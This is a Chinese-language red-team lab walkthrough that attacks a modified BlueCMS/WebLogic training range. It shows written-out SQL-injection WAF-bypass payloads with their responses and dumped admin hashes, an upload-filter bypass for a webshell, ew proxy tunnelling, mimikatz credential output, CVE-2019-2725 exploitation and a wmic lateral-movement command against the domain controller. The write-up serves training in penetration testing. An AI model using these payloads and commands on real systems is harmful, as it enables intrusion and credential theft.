2021年9月28日01:52:54评论1,906 views字数 6400阅读21分20秒阅读模式

当才华支撑不住你的野心,你就应该静下心来读书学习。

整理了“ATT&CK实战系列-红队评估"全部七套靶场。

文章结尾附全套免费下载链接。

靶机环境-魔改的红日6，修改了bluecms源码;

地址：http://vulnstack.qiyuanxuetang.net/vuln/detail/8/

外网Web：192.168.140.131/192.168.111.128

内网Web：192.168.111.80/10.10.10.80

DC：10.10.10.10

实验目的

获取 DC 服务器权限

0x01 外网web

首先来到外网web：

可以看到开放了80访问看看

可以看到是bluecms 1.6。这个cms很多漏洞，网上下载一套看看。

1.1 代码审计

全文搜索下$_GET

来到ad_js.php

$ad_id = !empty($_GET['ad_id']) ? trim($_GET['ad_id']) : '';if(empty($ad_id)){    echo 'Error!';    exit();}$ad = $db->getone("SELECT * FROM ".table('ad')." WHERE ad_id =".$ad_id);if($ad['time_set'] == 0){    $ad_content = $ad['content'];}else{    if($ad['end_time'] < time())    {        $ad_content = $ad['exp_content'];    }    else    {        $ad_content = $ad['content'];    }}

可以看到如果ad_id不为空就删除两边的空白符号，否则输出Error，然后就会执行getone方法，跟踪下getone。

    function getone($sql, $type=MYSQL_ASSOC){        $query = $this->query($sql,$this->linkid);        $row = mysql_fetch_array($query, $type);        return $row;    }

可以看到没有做任何过滤，直接带入了执行了sql语句。

http://192.168.140.131/ad_js.php?ad_id=1 and 1=1

可以看到存在waf。

1.2 waf绕过

fuzz下加上/"%!* 来干扰。 绕过order by

ad_js.php?ad_id=1/%//order////by////8

http://192.168.140.131/ad_js.php?ad_id=1/*%%2f*/order/*%2f%2f*/by/*%2f%2f*/8

ad_js.php?ad_id=1/%//order////by////7

<!--document.write("");-->

绕过union select

ad_js.php?ad_id=-1/*%/*/union/*//*/select/*//*/1,2,3,4,5,6,7

全部被拦截，加上/!50001/再来跑

/ad_js.php?ad_id=-1/*%/*/union/*//*//*!50448select*//*//*/1,2,3,4,5,6,7

返回包：

HTTP/1.1 200 OKDate: Sun, 25 Jul 2021 10:29:14 GMTServer: Apache/2.4.18 (Win32) OpenSSL/1.0.2e PHP/5.3.29Set-Cookie: BLUE[user_id]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnlySet-Cookie: BLUE[user_name]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnlySet-Cookie: BLUE[user_pwd]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnlyContent-Length: 33Connection: closeContent-Type: text/html;charset=gb2312<!--document.write("7");-->

获取当前表：正常语句：

union select 1,2,3,4,5,6,group_concat(table_name), from information_schema.tables where table_schema=database()

套用上面的被拦截，逐条测试哪里被拦截了

发现只要不存在database()就不会被拦截

同理fuzz括号里面就行 bypass payload：

/ad_js.php?ad_id=-1/*%/*/union/*//*//*!50448select*//*//*/1,2,3,4,5,6,group_concat(table_name) from information_schema.tables where table_schema=database(/*%!"/*/

返回包：

HTTP/1.1 200 OKDate: Sun, 25 Jul 2021 10:37:08 GMTServer: Apache/2.4.18 (Win32) OpenSSL/1.0.2e PHP/5.3.29Set-Cookie: BLUE[user_id]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnlySet-Cookie: BLUE[user_name]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnlySet-Cookie: BLUE[user_pwd]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnlyContent-Length: 401Connection: closeContent-Type: text/html;charset=gb2312<!--document.write("blue_ad,blue_ad_phone,blue_admin,blue_admin_log,blue_ann,blue_ann_cat,blue_arc_cat,blue_area,blue_article,blue_attachment,blue_buy_record,blue_card_order,blue_card_type,blue_category,blue_comment,blue_config,blue_flash_image,blue_guest_book,blue_ipbanned,blue_link,blue_model,blue_navigate,blue_pay,blue_post,blue_post_att,blue_post_pic,blue_service,blue_task,blue_user");-->

可以看到存在blue_admin表，查看该表存在的字段

正常语句：

union select 1,2,3,4,5,6,group_concat(column_name) from information_schema.columns where table_name='blue_admin'

单引号过滤hex编码下

bypass payload:

/ad_js.php?ad_id=-1/*%/*/union/*//*//*!50448select*//*//*/1,2,3,4,5,6,group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=0x626C75655F61646D696E

返回包：

HTTP/1.1 200 OKDate: Sun, 25 Jul 2021 11:03:52 GMTServer: Apache/2.4.18 (Win32) OpenSSL/1.0.2e PHP/5.3.29Set-Cookie: BLUE[user_id]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnlySet-Cookie: BLUE[user_name]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnlySet-Cookie: BLUE[user_pwd]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnlyContent-Length: 108Connection: closeContent-Type: text/html;charset=gb2312<!--document.write("admin_id,admin_name,email,pwd,purview,add_time,last_login_time,last_login_ip");-->

存在admin_name,pwd

获取账密正常语句套同样的过滤语句：blue_admin:

/ad_js.php?ad_id=-1/*%/*/union/*//*//*!50448select*//*//*/1,2,3,4,5,6,group_concat(admin_name)%20from%20blue_admin

返回包:

HTTP/1.1 200 OKDate: Sun, 25 Jul 2021 11:08:14 GMTServer: Apache/2.4.18 (Win32) OpenSSL/1.0.2e PHP/5.3.29Set-Cookie: BLUE[user_id]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnlySet-Cookie: BLUE[user_name]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnlySet-Cookie: BLUE[user_pwd]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnlyContent-Length: 37Connection: closeContent-Type: text/html;charset=gb2312<!--document.write("admin");-->

pwd:

/ad_js.php?ad_id=-1/*%/*/union/*//*//*!50448select*//*//*/1,2,3,4,5,6,group_concat(pwd)%20from%20blue_admin

返回包:

HTTP/1.1 200 OKDate: Sun, 25 Jul 2021 11:09:17 GMTServer: Apache/2.4.18 (Win32) OpenSSL/1.0.2e PHP/5.3.29Set-Cookie: BLUE[user_id]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnlySet-Cookie: BLUE[user_name]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnlySet-Cookie: BLUE[user_pwd]=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; HttpOnlyContent-Length: 64Connection: closeContent-Type: text/html;charset=gb2312<!--document.write("cc03e747a6afbbcbf8be7668acfebee5");-->

获得账密:admin/test123

1.3 后台getshell

这里尝试了文件包含发现不行,发现robots.txt下存在test目录的upload.html文件

直接被拦截了

这里我们可以修改

Content-Disposition: form-data; name="file"; filename="t.php"

为

Content-Disposition: form-data; name="file"; filename=; filename="t.php"

来绕过

0x02 内网渗透

可以看到权限还是挺高的。存在111段

上传ew到web靶机

执行

ew.exe -s ssocksd -l 1266

添加用户上去，mimikatz抓密码

aspnet    161cff084477fe596a5db81874498a24(1qaz@WSX)itsec        852a844adfce18f66009b4f14e0a98de(test123..)Administrator    852a844adfce18f66009b4f14e0a98de(test123..)

c段发现存在80

存在administrator用户明文看看能不能直接ipc

密码不对。开放了80和7001

80没啥东西7001为weblogic

存在CVE-2019-2725

拿下内网weblogic

可以看到存在域de1ay.com,拿到了本地管理员权限。

存在10.10.10段

抓下密码：

* Username : de1ay* Domain   : WEB* NTLM     : cb5141dcdaa451b0972f3144fda5b3cd* SHA1     : c25aadf268b15742f54e1ca78d54b1da417d5f8d* Password : 1qaz@WSX1qaz@WSXUser : AdministratorHash NTLM: 31d6cfe0d16ae931b73c59d7e0c089c0(可能没启用)

设置多层代理 attack ip:192.168.140.1 web:192.168.140.131/192.168.111.128 weblogic:192.168.111.80/10.10.10.80

上传ew到weblogic机器上执行监听本地8888端口：

ew.exe -s ssocksd -l 8888

在攻击机器上执行，把本地端口1080跟web的9999端口绑定：

ew.exe -s lcx_tran -l 1080 -f 192.168.140.131 -g 9999

在web机器上将本地的9999跟weblogic的8888绑定：

ew.exe -s lcx_tran -l 9999 -f 192.168.111.80 -g 8888

发现存在10机器。

用现有的密码加上域用户尝试爆破

user:

de1ayadministratorde1ayde1ay

pass:

1qaz@WSXtest123..1qaz@WSX1qaz@WSX

1.runas获取域用户cmd：

runas /user:de1ayadministrator cmd

wmi横向移动：

wmic /node:10.10.10.10 /user:de1ayadministrator /password:1qaz@WSX1qaz@WSX process call create "cmd /c ipconfig > c:1.txt"